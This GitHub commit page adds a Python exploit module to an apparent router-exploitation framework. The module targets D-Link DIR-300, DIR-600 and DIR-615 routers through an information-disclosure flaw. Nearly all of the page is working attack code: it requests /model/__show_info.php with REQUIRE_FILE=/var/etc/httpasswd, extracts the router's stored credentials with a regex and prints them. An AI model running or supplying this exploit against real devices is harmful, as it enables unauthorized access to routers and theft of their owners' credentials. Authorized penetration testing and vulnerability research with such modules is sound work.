-
Notifications
You must be signed in to change notification settings - Fork 121
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
dir300_600 and 615 information disclosure exploit
- Loading branch information
Showing
1 changed file
with
54 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
# Name:D-link DIR-300 DIR-600 and DIR-615 information disclosure | ||
# File:dir300_600_info.py | ||
# Author:Ján Trenčanský | ||
# License: GNU GPL v3 | ||
# Created: 18.07.2016 | ||
# Last modified: 18.07.2016 | ||
# Shodan Dork: | ||
# Description: Information disclosure on DIR-300, DIR-600 and DIR-615(4.0) | ||
# Based on: http://seclists.org/bugtraq/2013/Dec/11 | ||
|
||
import core.Exploit | ||
import core.io | ||
|
||
import requests | ||
import re | ||
from interface.messages import print_error, print_yellow, print_success, print_green | ||
|
||
|
||
class Exploit(core.Exploit.RextExploit): | ||
""" | ||
Name:D-link DIR-300 DIR-600 and DIR-615 information disclosure | ||
File:dir300_600_info.py | ||
Author:Ján Trenčanský | ||
License: GNU GPL v3 | ||
Created: 18.07.2016 | ||
Description: Information disclosure on DIR-300, DIR-600 and DIR-615(4.0) | ||
Based on: http://seclists.org/bugtraq/2013/Dec/11 | ||
Options: | ||
Name Description | ||
host Target host address | ||
port Target port | ||
""" | ||
password = "" | ||
|
||
def __init__(self): | ||
core.Exploit.RextExploit.__init__(self) | ||
|
||
def do_run(self, e): | ||
url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port) | ||
|
||
try: | ||
print_yellow("Sending exploit") | ||
response = requests.get(url, timeout=60) | ||
if response.status_code == 200 and "<center>" in response.text: | ||
print_success("credentials fetched") | ||
credentials = re.findall("<center>\n\t\t\t(.*)", response.text) | ||
print_green(credentials[0]) | ||
except requests.Timeout: | ||
print_error("timeout") | ||
except requests.ConnectionError: | ||
print_error("exploit failed") | ||
Exploit() |